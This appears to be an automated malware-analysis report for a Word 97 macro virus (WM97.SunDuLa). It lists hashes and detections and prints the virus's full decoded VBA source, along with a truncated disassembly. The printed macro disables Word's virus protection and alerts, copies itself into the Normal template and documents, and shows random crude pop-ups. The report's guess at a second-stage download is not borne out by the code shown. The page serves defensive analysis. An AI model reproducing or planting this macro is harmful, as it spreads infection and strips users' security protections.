Doc.Trojan.Sundula-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 ce0e74a32a0feaef…

MALICIOUS

Office (OLE)

30.0 KB Created: 1999-02-26 07:22:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: b98c3d4da9c600a4016baa43003c694b SHA-1: 3e612d3e2983af5f98df283b5c28bd69b63382c0 SHA-256: ce0e74a32a0feaeff6c32e1f5c0bfa462c4d65720ab4f97acc7236fff7132ab6
140 Risk Score

Malware Insights

Doc.Trojan.Sundula-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Trojan.Sundula-1. Static analysis revealed the presence of VBA macros within the document. The macro code attempts to disable virus protection and other security settings, indicating an intent to prepare the system for further malicious activity, likely the download and execution of a second-stage payload. The document body and metadata are minimal, but the macro's actions are indicative of a downloader or droppper.

Heuristics 2

  • ClamAV: Doc.Trojan.Sundula-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Sundula-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8635 bytes
SHA-256: 2a53b5372aca0eb197bc2370288de1f5739a7557c200da892f9d554c2a30c4c5
Detection
ClamAV: Doc.Trojan.Sundula-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'WM97.SunDuLa
Private Sub Document_Close()
 On Error Resume Next
 
 With Options
        .VirusProtection = False
        .SaveNormalPrompt = False
        .ConfirmConversions = False
 End With

With Application
       .ScreenUpdating = False
       .DisplayStatusBar = False
       .DisplayAlerts = False
End With
 
 Set norm = NormalTemplate.VBProject.VBComponents(1).codemodule
 Set doc = ActiveDocument.VBProject.VBComponents(1).codemodule
    
    If norm.Lines(1, 1) <> "'WM97.SunDuLa" Then
        norm.DeleteLines 1, norm.CountOfLines
        norm.InsertLines 1, doc.Lines(1, doc.CountOfLines)
        norm.replaceline 70, "Sub ViewVBcode()"
        ElseIf doc.Lines(1, 1) <> "'WM97.SunDuLa" Then
        doc.DeleteLines 1, doc.CountOfLines
        doc.InsertLines 1, norm.Lines(1, norm.CountOfLines)
        doc.replaceline 70, "Sub Toolsmacro()"
    End If

Randomize
If Int(Rnd * 12) = 2 Then
Application.EnableCancelKey = wdCancelDisabled
ShowVisualBasicEditor = False
Dim RandomNumber As Integer
RandomNumber = Int((Val(14) * Rnd) + 1)
Select Case RandomNumber
Case 1
MsgBox "Squirrels have fluffy tails!!", vbInformation, "Did you know?"
Case 2
MsgBox "Baboons have red butts!!", vbInformation, "Did you know?"
Case 3
MsgBox "Cows sleep standing up!!", vbInformation, "Did you know?"
Case 4
MsgBox "The average penis is 6 inchs long!!", vbInformation, "Did you know?"
Case 5
MsgBox "The average vagina is 9 inchs deep!!", vbInformation, "Did you know?"
Case 6
MsgBox "Flying squirrels don't fly they glide!!", vbInformation, "Did you know?"
Case 7
MsgBox "Life sucks!!", vbInformation, "Did you know?"
Case 8
MsgBox "Vampires are not real!!", vbInformation, "Did you know?"
Case 9
MsgBox "Werewolfs are not real!!", vbInformation, "Did you know?"
Case 10
MsgBox "The most dangerous wild animal is a deer!!", vbInformation, "Did you know"
Case 11
MsgBox "The platypus is the only mammal that lays eggs!!", vbInformation, "Did you know?"
Case 12
MsgBox "Flys live for about two days!!", vbInformation, "Did you know?"
Case 13
MsgBox "Turtles have shells!!", vbInformation, "Did you know?"
Case 14
MsgBox "Fish live in water!!", vbInformation, "Did you know?"
Case 15
MsgBox "You are infected with WM97.SunDuLa By Psyclone X [PE]!!", vbInformation, "Did you know?"
End Select
End If
End Sub
Sub Toolsmacro()
End Sub


' Processing file: /opt/analyzer/scan_staging/46d668465c47423c90dd128721c5be4d.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5248 bytes
' Line #0:
' 	QuoteRem 0x0000 0x000C "WM97.SunDuLa"
' Line #1:
' 	FuncDefn (Private Sub Document_Close())
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' Line #4:
' 	StartWithExpr 
' 	Ld Options 
' 	With 
' Line #5:
' 	LitVarSpecial (False)
' 	MemStWith VirusProtection 
' Line #6:
' 	LitVarSpecial (False)
' 	MemStWith SaveNormalPrompt 
' Line #7:
' 	LitVarSpecial (False)
' 	MemStWith ConfirmConversions 
' Line #8:
' 	EndWith 
' Line #9:
' Line #10:
' 	StartWithExpr 
' 	Ld Application 
' 	With 
' Line #11:
' 	LitVarSpecial (False)
' 	MemStWith ScreenUpdating 
' Line #12:
' 	LitVarSpecial (False)
' 	MemStWith DisplayStatusBar 
' Line #13:
' 	LitVarSpecial (False)
' 	MemStWith DisplayAlerts 
' Line #14:
' 	EndWith 
' Line #15:
' Line #16:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd codemodule 
' 	Set norm 
' Line #17:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd codemodule 
' 	Set doc 
' Line #18:
' Line #19:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld norm 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x000D "'WM97.SunDuLa"
' 	Ne 
' 	IfBlock 
' Line #20:
' 	LitDI2 0x0001 
' 	Ld 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.